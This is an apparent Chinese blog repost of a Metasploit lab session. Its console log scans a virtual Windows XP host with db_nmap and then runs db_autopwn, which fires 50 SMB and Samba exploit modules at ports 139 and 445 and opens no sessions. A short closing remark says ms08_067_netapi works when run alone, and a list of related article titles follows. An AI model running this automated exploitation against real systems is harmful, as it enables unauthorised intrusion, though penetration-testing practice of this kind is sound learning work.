metasploit之db_autopwn实战
来源:互联网 发布:开淘宝c店要多少钱 编辑:程序博客网 时间:2024/05/19 22:48
msf > db_nmap -O 192.168.1.142[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT[*] Nmap: Nmap scan report for 192.168.1.142[*] Nmap: Host is up (0.00047s latency).[*] Nmap: Not shown: 997 filtered ports[*] Nmap: PORT STATE SERVICE[*] Nmap: 139/tcp open netbios-ssn[*] Nmap: 445/tcp open microsoft-ds[*] Nmap: 2869/tcp closed icslap[*] Nmap: MAC Address: 00:0C:29:F1:31:D2 (VMware)[*] Nmap: Device type: general purpose[*] Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (99%)[*] Nmap: Aggressive OS guesses: Microsoft Windows XP SP3 (99%), Microsoft Windows XP (97%), Microsoft Windows Server 2003 SP1 or SP2 (97%), Microsoft Windows Server 2003 SP2 (97%), Microsoft Windows 2000 SP4 (95%), Microsoft Windows XP SP2 (95%), Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows 2000 SP0 (95%)[*] Nmap: No exact OS matches for host (test conditions non-ideal).[*] Nmap: Network Distance: 1 hop[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.48 secondsmsf > hostsHosts=====address mac name os_name os_flavor os_sp purpose info comments------- --- ---- ------- --------- ----- ------- ---- --------192.168.1.142 00:0C:29:F1:31:D2 Microsoft Windows XP device msf > db_autopwn -p -t -e[*] Analysis completed in 7 seconds (0 vulns / 0 refs)[*] [*] ================================================================================[*] Matching Exploit Modules[*] ================================================================================[*] 192.168.1.142:139 exploit/freebsd/samba/trans2open (port match)[*] 192.168.1.142:139 exploit/linux/samba/chain_reply (port match)[*] 192.168.1.142:139 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.142:139 exploit/linux/samba/trans2open (port match)[*] 192.168.1.142:139 exploit/multi/samba/nttrans (port match)[*] 192.168.1.142:139 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.142:139 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.142:139 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.142:139 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.142:139 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.142:139 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms07_029_msdns_zonename (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.142:139 exploit/windows/smb/ms10_061_spoolss (port match)[*] 192.168.1.142:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.142:139 exploit/windows/smb/psexec (port match)[*] 192.168.1.142:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] 192.168.1.142:445 exploit/freebsd/samba/trans2open (port match)[*] 192.168.1.142:445 exploit/linux/samba/chain_reply (port match)[*] 192.168.1.142:445 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.142:445 exploit/linux/samba/trans2open (port match)[*] 192.168.1.142:445 exploit/multi/samba/nttrans (port match)[*] 192.168.1.142:445 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.142:445 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.142:445 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.142:445 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.142:445 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.142:445 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms07_029_msdns_zonename (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.142:445 exploit/windows/smb/ms10_061_spoolss (port match)[*] 192.168.1.142:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.142:445 exploit/windows/smb/psexec (port match)[*] 192.168.1.142:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] ================================================================================[*] [*] [*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:139...[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:139...[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:139...[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:139...[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:139...[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:139...[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:139...[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:139...[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:139...[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:139...[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:139...[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:139...[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:139...[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:139...[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:139...[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:139...[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:139...[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:139...[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:139...[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:139...[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:139...[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:139...[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:139...[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:139...[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:445...[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:445...[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:445...[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:445...[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:445...[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:445...[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:445...[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:445...[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:445...[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:445...[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:445...[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:445...[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:445...[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:445...[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:445...[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:445...[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:445...[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:445...[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:445...[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:445...[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:445...[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:445...[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:445...[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:445...[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:445...[*] (50/50 [0 sessions]): Waiting on 25 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 14 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 11 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 3 launched modules to finish execution...[*] (50/50 [0 sessions]): Waiting on 0 launched modules to finish execution...[*] The autopwn command has completed with 0 sessionsmsf >
实战对象是XP SP3,如果单独使用ms08_067_netapi,是可以成功exploit的。但是,自动化后,就不行了。
db_autopwn前,应该对module进行过滤。
- metasploit之db_autopwn实战
- metasploit之db_autopwn
- Easy Pentesting: Metasploit's db_autopwn
- Pwning-using-OpenVAS-and-Metasploit-Db_Autopwn-video
- Metasploit没有db_autopwn命令的解决办法
- 修复metasploit v4.2.0 ,启用db_autopwn命令问题(t00ls)
- kali漏洞利用之Metasploit实战
- 实战Metasploit之安卓渗透舍友
- Metasploit-MSSQL渗透-实战篇
- Metasploit 实战第1章
- db_autopwn.rb
- 《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例Oracle数据库
- 《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例MS08-067漏洞
- Metasploit 之 webshell 提权
- metasploit之db_nmap
- metasploit之hosts
- Metasploit之Post Exploitation
- metasploit之客户端渗透
- VOIP DTMF inband 原理与实现方法
- (Problem 46)Goldbach's other conjecture
- TCP协议实现文件上传的底层代码
- StateListDrawable的使用
- Girls' research 最长回文串
- metasploit之db_autopwn实战
- 全距(Range)
- Hadoop集群运行JNI程序
- Wildcard Matching
- 架构师之路
- JDK环境变量配置
- ORACLE B树索引概念
- 为什么?
- 2013 Multi-University Training Contest 1 (hdu 4601 hdu 4603)
